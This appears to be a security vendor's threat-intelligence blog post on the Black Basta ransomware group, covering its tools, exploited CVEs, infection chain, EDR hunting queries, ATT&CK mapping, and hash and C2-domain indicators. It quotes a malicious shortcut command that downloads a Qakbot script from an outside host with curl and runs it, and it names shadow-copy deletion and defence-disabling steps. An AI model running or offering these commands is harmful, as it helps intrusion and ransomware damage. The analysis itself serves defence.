Black Basta Ransomware: What You Need to Know

Abhinav Paliwal

Overview

Black Basta is a ransomware group operating as ransomware-as-a-service (RaaS), first spotted in April 2022. It is known to use double extortion techniques where the group demands payment for the decryption and non-release of stolen data. Earlier versions of Black Basta share many similarities with Conti Ransomware.

A wide range of industries and critical infrastructure in North America, Europe, and Australia have been impacted by Black Basta. To date, 500+ organizations have been affected globally by Black Basta affiliates gaining initial access through common methods like phishing, Qakbot, Cobalt Strike, and exploitation of known vulnerabilities. Once inside, the bad actors move laterally within the network to identify critical systems and data before deploying ransomware. Black Basta has been associated with the FIN7 threat actor due to similarities in custom modules for evading Endpoint Detection and Response (EDR) systems.

Tools Used and Flaws Exploited

A list of known tools that the Black Basta group abused includes malware, adversary emulation, and legitimated tools:

BITSAdminMimikatzRCloneSplashtopWMI
Cobalt StrikeSoftPerfectWinSCPMimikatzQakbot
PowerShellScreenConnectPSExecEvilProxySystemBC
BackstabNetcatQuick AssistNetSupport Manager
Table 1: Tools used by Black Basta

Black Basta is also known to exploit various vulnerabilities for initial access, privilege escalation, and lateral movement. Here is the list of vulnerabilities exploited by Black Basta:

NameCVE IDCWE ID
ConnectWiseCVE-2024-1709CWE-288
Windows Error Reporting ServiceCVE-2024-26169CWE-269
ZeroLogonCVE-2020-1472CWE-330
NoPacCVE-2021-42278CWE-20
NoPacCVE-2021-42287CWE-269
PrintNightmareCVE-2021-34527CWE-269
Table 2: Known vulnerabilities exploited by Black Basta

Technical Analysis

The Black Basta infection chain usually starts with a spear phishing email campaign that delivers a malicious link or attachment to the victim. Other initial infection vectors, like exploitation of vulnerabilities and remote desktop protocol (RDP), were also used by this threat actor.

Downloaded zip archives contain malicious .lnk(shortcut) or an Excel file that downloads and executes Qakbot malware.

/q /c MD "%APPDATA%\xx\xxxx" && curl.exe --output %APPDATA%\xx\xxxx\qakbot.js hxxps://xxxxx[.]com/xxx.js && cd "%APPDATA%\xx\xxxx" && wscript qakbot.js

As shown in the command in LNK file, Curl and WScript are used to download and execute the Qakbot JavaScript file.

Upon execution, Qakbot established persistence using autorun entries and scheduled tasks, and for defensive evasion, various PowerShell script is executed to disable and remove the Windows Defender Antivirus protection.

Figure 1: Windows Defender disabled by PowerShell script of Qakbot

Qakbot also established C2 communication with the threat actor to deliver other malware like SystemBC, Cobalt Strike, etc., and legitimate tools such as BITSAdmin, Splashtop, Screen Connect, etc. Based on the TTPs employed by the affiliates of Black Basta, these tools/malware help in different phases of attacks, like Discovery, Privilege escalation, Credential access, and Lateral movement.

Admin credentials are obtained via tools like Mimikatz, which is used for credential dumping and pass-the-hash attacks. CobaltStrike Beacons enable the threat actor to move laterally and deploy ransomware across the network.

Once installed and established on the victim’s network, Black Basta first identifies and collects sensitive files for exfiltration. Rclone and WinSCP tools are used to exfiltrate data. Rclone provides the ability to upload data to configured cloud storage provider mostly Mega.

The next stage of the double extortion technique, after the exfiltration of data, is to encrypt endpoints with Black Basta ransomware. The ransomware binary uses vssadmin.exe to delete the shadow copy files to prevent system recovery.

Figure 2: Qualys EDR captures vssadmin used to delete shadow copy files

As depicted in the screenshot below, bcdedit.exe is leveraged to reboot the system in safe mode to disable endpoint defenses and start the operating system with a limited set of drivers and services.

Figure 3: Qualys EDR captures bcdedit used to reboot the system in safe mode

Once the system is rebooted in safe mode, Black Basta uses the ChaCha20 algorithm to encrypt files. The ChaCha20 encryption key is then encrypted with a public RSA-4096 key that is included in the executable.

It will also drop *.jpg and *.ico files on the %temp% directory and use registry modification to change the desktop background and file icon after encryption. The following are the registries that have been created/modified:

Figure 4: Registry Modification to change Desktop Background and encrypted files
Figure 5: Desktop background on victim’s system after encryption

The ransomware then generates multiple instances of a file, either named “readme.txt” or “instructions_read_me.txt” depending on the variant, which includes the following ransom note:

Figure 6: Ransom note of the Black Basta Ransomware

Hunting Queries

Qualys Endpoint Detection and Response (EDR) customers use these hunting queries to detect suspicious activities associated with Black Basta Ransomware. For any hits, investigate the file modifications, network connections, child/parent processes, and cross-process injections. Qualys also recommends tuning hunting queries for any false positives as per the customer environment.

ProcedureTIDQuery
Using vssadmin to delete Shadow copy filesT1490(parent.name:cmd.exe and process.name:vssadmin.exe and process.arguments:”delete shadows”)
Reboot victim’s machine in safe mode using bcdeditT1562.009(parent.name:cmd.exe and process.name:bcdedit.exe and process.arguments:”safeboot network”)
Qakbot JS file dropped using curl into %AppData% directoryT1105(parent.name:curl.exe and (file.fullpath:AppData or file.extension:js))
Disable Windows Defender protection using PowerShellT1562.001(process.name:powershell.exe and (process.arguments:DisableAntiSpyware or process.arguments:DisableRealtimeMonitoring))
Hunting for Ransom NoteT1486(file.extension:txt and (file.name:”readme.txt” or file.name:”instructions_read_me.txt”))
Table 3: Threat Hunting Queries for Qualys EDR

MITRE ATT&CK Techniques

TacticTechniqueID
Initial AccessPhishingT1566
Initial AccessExploit Public-Facing ApplicationT1190
DiscoveryFile and Directory DiscoveryT1083
ExecutionUser Execution: Malicious FileT1204.002
ExecutionCommand and Scripting Interpreter: Windows Command ShellT1059.003
ExecutionWindows Management InstrumentationT1047
ExecutionCommand and Scripting Interpreter: PowerShellT1059.001
PersistenceCreate or Modify System Process: Windows ServiceT1543.003
Privilege EscalationExploitation for Privilege EscalationT1068
Defense EvasionVirtualization/Sandbox EvasionT1497
Defense EvasionImpair Defenses: Safe Mode BootT1562.009
Defense EvasionMasqueradingT1036
Defense EvasionModify RegistryT1112
Defense EvasionImpair Defenses: Disable or Modify ToolsT1562.001
ImpactInhibit System RecoveryT1490
ImpactData Encrypted for ImpactT1486
Table 4: Mitre ATT&CK TTPs

Indicators of Compromise

IndicatorTypeName
17205c43189c22dfcb278f5cc45c2562f622b0b6280dcd43cc1d3c274095eb90SHA256Black Basta
b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9SHA256Black Basta
88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dcccccSHA256Black Basta
58ddbea084ce18cfb3439219ebcf2fc5c1605d2f6271610b1c7af77b8d0484bdSHA256Black Basta
39939eacfbc20a2607064994497e3e886c90cd97b25926478434f46c95bd8eadSHA256Black Basta
5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221SHA256Black Basta
51eb749d6cbd08baf9d43c2f83abd9d4d86eb5206f62ba43b768251a98ce9d3eSHA256Black Basta
d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1SHA256Black Basta
5942143614d8ed34567ea472c2b819777edd25c00b3e1b13b1ae98d7f9e28d43SHA256Black Basta
05ebae760340fe44362ab7c8f70b2d89d6c9ba9b9ee8a9f747b2f19d326c3431SHA256Black Basta
a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6SHA256Black Basta
86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737SHA256Black Basta
07117c02a09410f47a326b52c7f17407e63ba5e6ff97277446efc75b862d2799SHA256Black Basta
96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5beSHA256Black Basta
1c1b2d7f790750d60a14bd661dae5c5565f00c6ca7d03d062adcecda807e1779SHA256Black Basta
360c9c8f0a62010d455f35588ef27817ad35c715a5f291e43449ce6cb1986b98SHA256Black Basta
0554eb2ffa3582b000d558b6950ec60e876f1259c41acff2eac47ab78a53e94aSHA256Black Basta
9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bcSHA256Black Basta
62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087SHA256Black Basta
7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59SHA256Black Basta
350ba7fca67721c74385faff083914ecdd66ef107a765dfb7ac08b38d5c9c0bdSHA256Black Basta
90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7SHA256Black Basta
fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08SHA256Black Basta
acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8fSHA256Black Basta
d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464dSHA256Black Basta
f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4SHA256Black Basta
723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224SHA256Black Basta
ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6eSHA256Black Basta
fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435fSHA256Black Basta
df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415SHA256Black Basta
462bbb8fd7be98129aa73efa91e2d88fa9cafc7b47431b8227d1957f5d0c8ba7SHA256Black Basta
3c50f6369f0938f42d47db29a1f398e754acb2a8d96fd4b366246ac2ccbe250aSHA256Black Basta
5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aaSHA256Black Basta
37a5cd265f7f555f2fe320a68d70553b7aa9601981212921d1ac2c114e662004SHA256Black Basta
3090a37e591554d7406107df87b3dc21bda059df0bc66244e8abef6a5678af35SHA256Black Basta
17879ed48c2a2e324d4f5175112f51b75f4a8ab100b8833c82e6ddb7cd817f20SHA256Black Basta
42f05f5d4a2617b7ae0bc601dd6c053bf974f9a337a8fcc51f9338b108811b78SHA256Black Basta
882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3SHA256Black Basta
e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757SHA256Black Basta
0a8297b274aeab986d6336b395b39b3af1bb00464cf5735d1ecdb506fef9098eSHA256Black Basta
69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944SHA256Black Basta
3337a7a9ccdd06acdd6e3cf4af40d871172d0a0e96fc48787b574ac93689622aSHA256Black Basta
7883f01096db9bcf090c2317749b6873036c27ba92451b212b8645770e1f0b8aSHA256Black Basta
0c964ac2f65f270eb19982b04ae346e72976bdf19b88ffd2308700dcce2b5ec0SHA256Black Basta
0db7a0327192710c403e021cbfc3902d75c729b3ba59d87159bf8f59a151a481SHA256Black Basta
ab913b3bb637447f33add3c7020d353389738e4d532b905caed04c7c7f399277SHA256Black Basta
a199c9d91a1e7c7051ec40f0a3a51143aa9f06af47a2a5f0e2dd235d7e1fe386SHA256Black Basta
699aaea1598a034cde7ed88cd8a8a36fd59447e09bddef566357061774c48a76SHA256Black Basta
53a06b78d89fe3f981ff32cd7a66f31e099d4bbaac36d7c64ed08d615d314408SHA256Black Basta
1d040540c3c2ed8f73e04c578e7fb96d0b47d858bbb67e9b39ec2f4674b04250SHA256Black Basta
9f948af3a30f125dcd24d8a628b3a18c66b3d72baede8496ee735cbdfd9cf0c7SHA256Black Basta
1391c20a26f248f7c602f20096bf1886cfe7e4d151602a1258a9bbe7c02c1c80SHA256Black Basta
5b6c3d277711d9f847be59b16fd08390fc07d3b27c7c6804e2170f456e9f1173SHA256Black Basta
15abbff9fbce7f5782c1654775938dcd2ce0a8ebd683a008547f8a4e421888c4SHA256Black Basta
d943a4aabd76582218fd1a9a0a77b2f6a6715b198f9994f0feae6f249b40fdf9SHA256Black Basta
d1949c75e7cb8e57f52e714728817ce323f6980c8c09e161c9e54a1e72777c13SHA256Black Basta
1ed076158c8f50354c4dba63648e66c013c2d3673d76ac56582204686aae6087SHA256Black Basta
48976d7bf38cca4e952507e9ab27e3874ca01092eed53d0fde89c5966e9533bbSHA256Black Basta
21033cd24a9d775d7daa7bbc5c5b007553f205ac0febb6bae3fa35c700676bdaSHA256Black Basta
cce74c82a718be7484abf7c51011793f2717cfb2068c92aa35416a93cbd13cfaSHA256Black Basta
09bc7247b50a166996b667b9a6e696cfbafa203ffcbec46ad0cca27deacd5c25SHA256Black Basta
449d87ca461823bb85c18102605e23997012b522c4272465092e923802a745e9SHA256Black Basta
dc56a30c0082145ad5639de443732e55dd895a5f0254644d1b1ec1b9457f04ffSHA256Black Basta
affcb453760dbc48b39f8d4defbcc4fc65d00df6fae395ee27f031c1833abadaSHA256Black Basta
203d2807df6ef531efbec7bfd109986de3e23df64c01ea4e337cbe5ba675248bSHA256Black Basta
ab1a3f8a0510ffa3c043bc200fe357c9ce220ea916f50b8b5b454027ef935c54SHA256Black Basta
3eb22320da23748f76f2ce56f6f627e4255bc81d09ffb3a011ab067924d8013bSHA256Black Basta
50f45122fdd5f8ca05668a385a734a278aa126ded185c3377f6af388c41788cbSHA256Black Basta
a54fef5fe2af58f5bd75c3af44f1fba22b721f34406c5963b19c5376ab278cd1SHA256Black Basta
df9498892ae72f611128c9a8bc57b93964f34cc235f5aaf57fe10fb2b3c69aa3SHA256Black Basta
1fd42d07b4be99e0e503c0ed5af2274312be1b03e01b54a6d89c0eef04257d6eSHA256Black Basta
9f188b2f4aa6a5ff3a6fb9048a20c5566f25bd9fb313ed1ba1d332fadd82690fSHA256Black Basta
f14c7eacdb39f1decdcf1e68f57c87340968fede1dc0391b2b082f58bd3a3f93SHA256Black Basta
d8e9e06b7adea939bcc135876f4e8a1d3719120e8ad9d4d72812ffd1dbee62fcSHA256Black Basta
0da309cc4f0d21c76c26d7b4f1c65bb1659908f191edb01d76ff22c8dabef0b1SHA256Black Basta
46be54f719ee76af15099de6e337b05a0a442c813e815bbed92a71135cfd9ab2SHA256Black Basta
dd32c037ed9b72acb6eda4f5193c7f1adc1e7e8d2aefcdd4b16de2f48420e1d3SHA256Black Basta
0bce6dc27d2cbdc231b563427c3489ddc69a0a88012abccd49b32c931dd93a81SHA256Black Basta
4b83aaecddfcb8cf5caeff3cb30fee955ecfc3eea97d19dccf86f24c77c41fc4SHA256Black Basta
5211ad84270862e68026ce8e6c15c1f8499551e19d2967c349b46d3f8cfcdcaaSHA256Black Basta
b18b40f513bae376905e259d325c12f9d700ee95f0d908a4d977a80c0420d52eSHA256Black Basta
trailshop[.]netC2 DomainCobalt Strike
realbumblebee[.]netC2 DomainCobalt Strike
recentbee[.]netC2 DomainCobalt Strike
investrealtydom[.]netC2 DomainCobalt Strike
webnubee[.]comC2 DomainCobalt Strike
artspathgroup[.]netC2 DomainCobalt Strike
buyblocknow[.]comC2 DomainCobalt Strike
currentbee[.]netC2 DomainCobalt Strike
modernbeem[.]netC2 DomainCobalt Strike
startupbusiness24[.]netC2 DomainCobalt Strike
magentoengineers[.]comC2 DomainCobalt Strike
childrensdolls[.]comC2 DomainCobalt Strike
myfinancialexperts[.]comC2 DomainCobalt Strike
limitedtoday[.]comC2 DomainCobalt Strike
kekeoamigo[.]comC2 DomainCobalt Strike
nebraska-lawyers[.]comC2 DomainCobalt Strike
tomlawcenter[.]comC2 DomainCobalt Strike
thesmartcloudusa[.]comC2 DomainCobalt Strike
rasapool[.]netC2 DomainCobalt Strike
artspathgroupe[.]netC2 DomainCobalt Strike
specialdrills[.]comC2 DomainCobalt Strike
thetrailbig[.]netC2 DomainCobalt Strike
Table 5: Indicators of Compromise

Stay to the “Left of Boom” of Emerging Threats

Get notified of the latest threat intelligence, vulnerabilities, and cybersecurity updates.

Subscribe to the Qualys blog.

Share your Comments

Comments

Your email address will not be published. Required fields are marked *